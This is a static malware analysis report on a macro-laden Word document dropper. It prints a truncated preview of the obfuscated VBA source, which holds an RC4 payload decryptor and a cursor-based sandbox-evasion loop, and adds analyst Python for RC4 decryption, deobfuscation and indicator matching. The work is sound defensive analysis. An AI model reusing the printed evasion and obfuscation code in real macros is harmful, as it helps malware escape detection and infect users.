Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 6dc0bd77e51eb9af…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 96.1 KB
Created: 2016-02-14 17:17:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2016-03-27
MD5: e3d0f89ff5a826cafdcb37603ea277d5
SHA-1: 7bf2ffa8a3fcc5d1ea4a43029a0eb1a9b5f13cfa
SHA-256: 6dc0bd77e51eb9af143c749539bd638020d557083479bcd4c4b9639fe61eb0f8
Risk score: 182

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment
T1203 Exploitation for Client Execution

The sample is a malicious OOXML (Word) document carrying a VBA project (word/vbaProject.bin). A Document_Open auto-execution macro together with a Shell() call means arbitrary code runs as soon as the document is opened with macros enabled; the SE_ENABLE_LURE heuristic indicates the document body asks the user to enable macros or editing, the usual social-engineering step for getting past Office's macro protection. The extracted source (macros.bas) is obfuscated in three cheap ways: every routine is padded with assignments to never-used variables followed by a numeric comment (UfkIAAhJ0pI4K = 58 '63), numeric constants are hidden behind arithmetic ((2317 - 2062) is 255, (1020160 / 3985) is 256, (22830 / 2283) is 10), and all identifiers are random strings. Two routines are nonetheless recognisable in the visible portion. WYui1L9 is textbook RC4: a 256-entry state table filled 0..255, the key-mixing swap loop indexed modulo the key length (ETijRCiSJQF returns an array's upper bound by indexing until an error), and a keystream loop that XORs each data byte through JHfaUtmUSoeMf; it decrypts an embedded payload or strings whose key and ciphertext are not in the visible portion. H7wPqyWQN is a sandbox check built on the User32 GetCursorPos API: if the cursor sits near the origin (x + y below 10) it loops forever, otherwise it polls with one-second Timer delays until the cursor has moved at least twice or a bounded number of polls has elapsed (the bound is cut off in the preview). Combined with the shell/download tokens found in the p-code, the behaviour is consistent with a downloader or dropper that decrypts its next stage only on a machine with a live user. Note that the findings evidence macro execution after the user enables content rather than an exploit; T1204.002 (User Execution: Malicious File) describes the execution path more precisely than T1203.
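The routine WYui1L9 in the extracted macros.bas (see the preview under Extracted artifacts) is RC4 with its constants hidden behind arithmetic: a 256-entry table filled 0..255, the key-mixing swap loop, then the keystream loop XORing each data byte through JHfaUtmUSoeMf. The Python below is an added example written for this report, not code from the report, the analysis tool, or the sample; it reproduces that routine so an analyst can decrypt the payload once the key and ciphertext bytes are recovered from the full macro. Because neither is in the visible portion, the demo input is the published RC4 test vectors, and decrypt_blob is a hypothetical helper name.

```python
"""RC4 as implemented by WYui1L9 in the extracted macro (added example; not code from
the report, the analysis tool, or the sample)."""
from __future__ import annotations


def rc4_ksa(key: bytes) -> list[int]:
    """Key scheduling. Mirrors the first two VBA loops: fill B4MzngC with 0..255 (the
    bound is written as (2317 - 2062)), then swap entries while mixing in key bytes
    indexed by LXZPzw Mod (UBound(key) + 1), i.e. modulo the key length."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    return s


def rc4_crypt(data: bytes, key: bytes) -> bytes:
    """Keystream generation plus XOR. Mirrors the third VBA loop: i = (i + 1) Mod 256,
    j = (j + S[i]) Mod 256, swap, then data[k] Xor S[(S[i] + S[j]) Mod 256] via the
    JHfaUtmUSoeMf helper. RC4 is symmetric, so the same call decrypts."""
    s = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for b in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


def decrypt_blob(blob_hex: str, key: bytes) -> bytes:
    """Hypothetical analyst helper (assumption: the ciphertext is carved out as a hex
    string). With the key bytes and ciphertext pulled from the full macro, this returns
    the decrypted next stage."""
    return rc4_crypt(bytes.fromhex(blob_hex), key)


if __name__ == "__main__":
    # Constructed demo input: the standard RC4 test vector, not data from the sample.
    ct = rc4_crypt(b"Plaintext", b"Key")
    print(ct.hex())               # bbf316e8d940af0ad3
    print(rc4_crypt(ct, b"Key"))  # b'Plaintext'
```

Two details matter when reproducing the macro's output exactly: the VBA key index is LXZPzw Mod (ETijRCiSJQF(key) + 1), and since ETijRCiSJQF returns the upper bound, that is the key length as used here; and the VBA state table is declared As Integer rather than Byte, which changes nothing because every entry stays within 0..255.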

Heuristics (6)

  • VBA project inside OOXML (medium, OOXML_VBA, 3 related findings)
    The document contains a VBA project (word/vbaProject.bin), i.e. macros are present.
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    The macro source calls Shell(), which launches an external program or command line from the document.
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open runs automatically when the document is opened with macros enabled, so the Shell() path needs no user action beyond the enable click.
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents and documents whose source extraction fails, where no visible source is available.
  • Macro/content-enable lure (medium, SE_ENABLE_LURE)
    The document instructs the user to enable macros or editing, the usual social-engineering step droppers use to get past Office's macro security settings.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it. Every URL below was found in document text (OOXML body / shared strings):
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape
    Caveat: all twelve are XML namespace identifiers (xmlns declarations) from the OOXML and Word 2010 extension schemas and appear in any .docx saved by Word 2010. They are never contacted at run time and are not indicators of compromise. No URL was extracted from the macro channel, so any download destination the macro uses is not visible statically and is most likely produced at run time, plausibly by the RC4 routine in the extracted source.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 114968 bytes
SHA-256: c11eb2a2993511b8c3ac90b7aebcff2bcbb4857d17d239463da9aafb67177b73
Preview: first 1,000 lines of the extracted script (the copy reproduced below is cut short)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim MwGKiqklcpKBQN(3197) As Integer
Dim QAJfCyxmS7m(9000) As Long, Um6A4Q23aO(9999) As Long
Private Type QelScG3t
FXtIIJEmc As Integer
HDHgbZwgtCiSpIoS As Integer
End Type
#If VBA7 Then
Private Declare PtrSafe Sub GetCursorPos Lib "User32" (VorDe5Zwo0 As QelScG3t)
#Else
Private Declare Sub GetCursorPos Lib "User32" (VorDe5Zwo0 As QelScG3t)
#End If
Function JHfaUtmUSoeMf(AqqhAeSV3VI, JdFXCpVSYGjQEbueZ)
UfkIAAhJ0pI4K = 58 '63
JHfaUtmUSoeMf = AqqhAeSV3VI Xor JdFXCpVSYGjQEbueZ
PbcsZhe4NMd = 19 '71
End Function
Function WYui1L9(S4aoOZTs4() As Byte, XUexXVsefQB() As Byte) As String
On Error Resume Next
Dim B4MzngC(0 To 255) As Integer, LXZPzw As Long, Jl7IQL373u As Long, FJN As Long, SedZ5jikZelJ7n As Byte, RCBy8y8wrIl() As Byte, Ld70lb() As Byte
ReDim RCBy8y8wrIl(ETijRCiSJQF(S4aoOZTs4)) As Byte
RCBy8y8wrIl = S4aoOZTs4
ReDim Ld70lb(ETijRCiSJQF(XUexXVsefQB)) As Byte
Ld70lb = XUexXVsefQB
For LXZPzw = 0 To (2317 - 2062)
B4MzngC(LXZPzw) = LXZPzw
Next LXZPzw
LXZPzw = 0
Jl7IQL373u = 0
FJN = 0
For LXZPzw = 0 To (-7321 + 7576)
Jl7IQL373u = (Jl7IQL373u + B4MzngC(LXZPzw) + Ld70lb(LXZPzw Mod (ETijRCiSJQF(XUexXVsefQB) + 1))) Mod ((-1633 + 1889))
SedZ5jikZelJ7n = B4MzngC(LXZPzw)
B4MzngC(LXZPzw) = B4MzngC(Jl7IQL373u)
B4MzngC(Jl7IQL373u) = SedZ5jikZelJ7n
Next LXZPzw
LXZPzw = 0
Jl7IQL373u = 0
FJN = 0
For LXZPzw = 0 To ETijRCiSJQF(S4aoOZTs4)
Jl7IQL373u = (Jl7IQL373u + 1) Mod (1020160 / 3985)
FJN = (FJN + B4MzngC(Jl7IQL373u)) Mod (1249280 / 4880)
SedZ5jikZelJ7n = B4MzngC(Jl7IQL373u)
B4MzngC(Jl7IQL373u) = B4MzngC(FJN)
B4MzngC(FJN) = SedZ5jikZelJ7n
RCBy8y8wrIl(LXZPzw) = JHfaUtmUSoeMf(RCBy8y8wrIl(LXZPzw), (B4MzngC((B4MzngC(Jl7IQL373u) + B4MzngC(FJN)) Mod ((-3302 + 3558)))))
Next LXZPzw
WYui1L9 = V6RAi6IOw4pcJUp4o(RCBy8y8wrIl)
End Function
Sub Pq21G7K6SVUPuK()
VVezO9M21 = 10 '46
HUJ2FegX77yUAwtC = 41 '17
End Sub
Function KgGXuJ(ByVal Rfsudo9lSQ As Integer) As String
MrEWys33re = 44 '28
Dim N5543yfgVv(1) As Byte, TIYWzwhU7g  As Byte, Op7ekYMn  As Byte
DvUZi6e26vtJ27 = 19 '14
If Rfsudo9lSQ < 0 Then Exit Function
FvKs = 52 '61
If Rfsudo9lSQ > (5885 - 5630) Then
CRWMn2N8Bg7DBC = 65 '37
Op7ekYMn = 0
Else
UARhm2kNa = 74 '22
TIYWzwhU7g = Rfsudo9lSQ
TUvRtGpJpEC = 9 '91
Op7ekYMn = 0
O3qBNrDuzGB3H5UE = 28 '22
End If
MnA4TNbeicXAa = 11 '24
N5543yfgVv(0) = TIYWzwhU7g
N3lraHhOGS0r = 31 '26
N5543yfgVv(1) = Op7ekYMn
HA2xLuUdW2 = 43 '33
KgGXuJ = N5543yfgVv
DjtPkFg = 64 '9
End Function
Function ETijRCiSJQF(ByVal WWs1ARAI9VCIB299m As Variant) As Long
PUGaY4k = 74 '1
On Error GoTo DB8limVUGA5
FSi6R4NsFx1D = 75 '63
Dim DDeKUGTkqhx5 As Long, GPTdbzmn4si As Variant
UyWJIDxddyO9lQR5 = 59 '97
Do
GPTdbzmn4si = WWs1ARAI9VCIB299m(DDeKUGTkqhx5)
DDeKUGTkqhx5 = DDeKUGTkqhx5 + 1
Loop
OofGoNY65U = 9 '97
DB8limVUGA5:
EUx6qT3CW = 8 '93
If DDeKUGTkqhx5 = 0 Then Exit Function
G2MnB1gVL = 58 '28
ETijRCiSJQF = DDeKUGTkqhx5 - 1
HnF8UKj02e7 = 7 '2
End Function
Sub H7wPqyWQN()
O9NlNLMwl7FBfl = 7 '15
Dim GhyDI As QelScG3t, Bn4S0xAYm As Integer, LnkshwqFQVD As Long, BvnhC2j0ig As Long, KdLszP1yqbv As Integer, L7J3GewxaOt As Integer
EpzYSYvg = 39 '29
KdLszP1yqbv = (9300 - 9298)
LN6CheeYJ = 16 '46
GetCursorPos GhyDI
XfCddiEq = 28 '7
Bn4S0xAYm = GhyDI.FXtIIJEmc + GhyDI.HDHgbZwgtCiSpIoS
Gi6GZeBHtYQ = 98 '59
If Bn4S0xAYm < (22830 / 2283) Then
T7Hwl = 68 '35
Do
Loop Until 1 = 0
OTIkml1GSL = 92 '72
End If
TgmFUyBb6nko5C = 23 '77
L7J3GewxaOt = 0
K19a2rUKoA = 34 '80
Do
BvnhC2j0ig = Timer + 1
Do While Timer < BvnhC2j0ig
Loop
GetCursorPos GhyDI
If GhyDI.FXtIIJEmc + GhyDI.HDHgbZwgtCiSpIoS <> Bn4S0xAYm Then
L7J3GewxaOt = L7J3GewxaOt + 1
If L7J3GewxaOt >= KdLszP1yqbv Then Exit Do
Bn4S0xAYm = GhyDI.FXtIIJEmc + GhyDI.HDHgbZwgtCiSpIoS
End If
LnkshwqFQVD = LnkshwqFQVD + 1
Loop Until LnkshwqFQVD = (-2657 + 2
... (truncated)
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 165888 bytes
SHA-256: 3fd0252d612dd9ad32334807e8d629820afed7cbbf7259b1dc8a4ed56710d8d7
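A first pass over the extracted macros.bas is much easier after undoing the two cheap obfuscations visible in the preview: padding lines that assign a literal to a never-used name followed by a numeric comment (UfkIAAhJ0pI4K = 58 '63), and constants written as parenthesised arithmetic ((2317 - 2062) for 255, (1020160 / 3985) for 256, (22830 / 2283) for 10). The Python below is an added example written for this report, not part of the analysis tool or the sample; it folds those expressions, drops the junk lines, and tags the indicators the heuristics fired on (auto-exec entry points, Shell, Win32 Declare statements, GetCursorPos, XOR, Timer delays). SAMPLE_SRC is a constructed excerpt of lines copied from the preview above.

```python
"""Normaliser for the obfuscation style seen in macros.bas (added example written for
this report; not part of the analysis tool or the sample)."""
from __future__ import annotations

import re

# Padding line: literal assigned to a throw-away name, then a numeric comment,
# e.g.  UfkIAAhJ0pI4K = 58 '63   (pattern specific to this sample's padding style).
JUNK_ASSIGN = re.compile(r"^\s*[A-Za-z_]\w*\s*=\s*\d+\s*'\s*\d+\s*$")

# One parenthesised binary operation on two integer literals, e.g. (2317 - 2062).
CONST_EXPR = re.compile(r"\(\s*(-?\d+)\s*([-+*/])\s*(-?\d+)\s*\)")

# Indicators matching the heuristics that fired on the sample.
INDICATORS = {
    "auto_exec": re.compile(r"\b(Document_Open|AutoOpen|Auto_Open|AutoExec|Workbook_Open)\b", re.I),
    "shell_exec": re.compile(r"\b(Shell|WScript\.Shell|CreateObject)\b", re.I),
    "win32_api": re.compile(r"\bDeclare\b.*\bLib\s+\"\w+\"", re.I),
    "cursor_check": re.compile(r"\bGetCursorPos\b"),
    "xor_op": re.compile(r"\bXor\b", re.I),
    "timer_delay": re.compile(r"\bTimer\b", re.I),
}


def is_junk(line: str) -> bool:
    return JUNK_ASSIGN.match(line) is not None


def _fold(m: re.Match) -> str:
    a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
    if op == "+":
        return str(a + b)
    if op == "-":
        return str(a - b)
    if op == "*":
        return str(a * b)
    # Only fold exact integer divisions; leave anything else verbatim.
    if b == 0 or a % b:
        return m.group(0)
    return str(a // b)


def fold_constants(line: str) -> str:
    """Replace every (int op int) with its value until nothing changes. Array subscripts
    such as N5543yfgVv(1) are untouched because they carry no operator."""
    prev = None
    while prev != line:
        prev, line = line, CONST_EXPR.sub(_fold, line)
    return line


def normalize(src: str) -> str:
    """Drop junk lines and fold constants, keeping the remaining lines in order."""
    return "\n".join(fold_constants(ln) for ln in src.splitlines() if not is_junk(ln))


def find_indicators(src: str) -> dict[str, list[int]]:
    """Indicator name -> 1-based line numbers in the raw source, so the numbers line up
    with the extracted file rather than the normalised one."""
    hits: dict[str, list[int]] = {}
    for n, line in enumerate(src.splitlines(), 1):
        for name, rx in INDICATORS.items():
            if rx.search(line):
                hits.setdefault(name, []).append(n)
    return hits


# Constructed excerpt: lines copied from the macros.bas preview in this report.
SAMPLE_SRC = "\n".join([
    "#If VBA7 Then",
    'Private Declare PtrSafe Sub GetCursorPos Lib "User32" (VorDe5Zwo0 As QelScG3t)',
    "#Else",
    'Private Declare Sub GetCursorPos Lib "User32" (VorDe5Zwo0 As QelScG3t)',
    "#End If",
    "Function JHfaUtmUSoeMf(AqqhAeSV3VI, JdFXCpVSYGjQEbueZ)",
    "UfkIAAhJ0pI4K = 58 '63",
    "JHfaUtmUSoeMf = AqqhAeSV3VI Xor JdFXCpVSYGjQEbueZ",
    "PbcsZhe4NMd = 19 '71",
    "End Function",
    "For LXZPzw = 0 To (2317 - 2062)",
    "B4MzngC(LXZPzw) = LXZPzw",
    "Next LXZPzw",
    "Jl7IQL373u = (Jl7IQL373u + 1) Mod (1020160 / 3985)",
    "KdLszP1yqbv = (9300 - 9298)",
    "If Bn4S0xAYm < (22830 / 2283) Then",
    "BvnhC2j0ig = Timer + 1",
])

if __name__ == "__main__":
    print(normalize(SAMPLE_SRC))
    for name, lines in sorted(find_indicators(SAMPLE_SRC).items()):
        print(f"{name}: lines {lines}")
```

The folder deliberately handles only one binary operation on two integer literals, which is all this sample uses; nested or mixed expressions, and anything inside string literals, would need a real expression parser. Run the indicator pass on the raw file and the folder on a copy so reported line numbers still point at the original artifact.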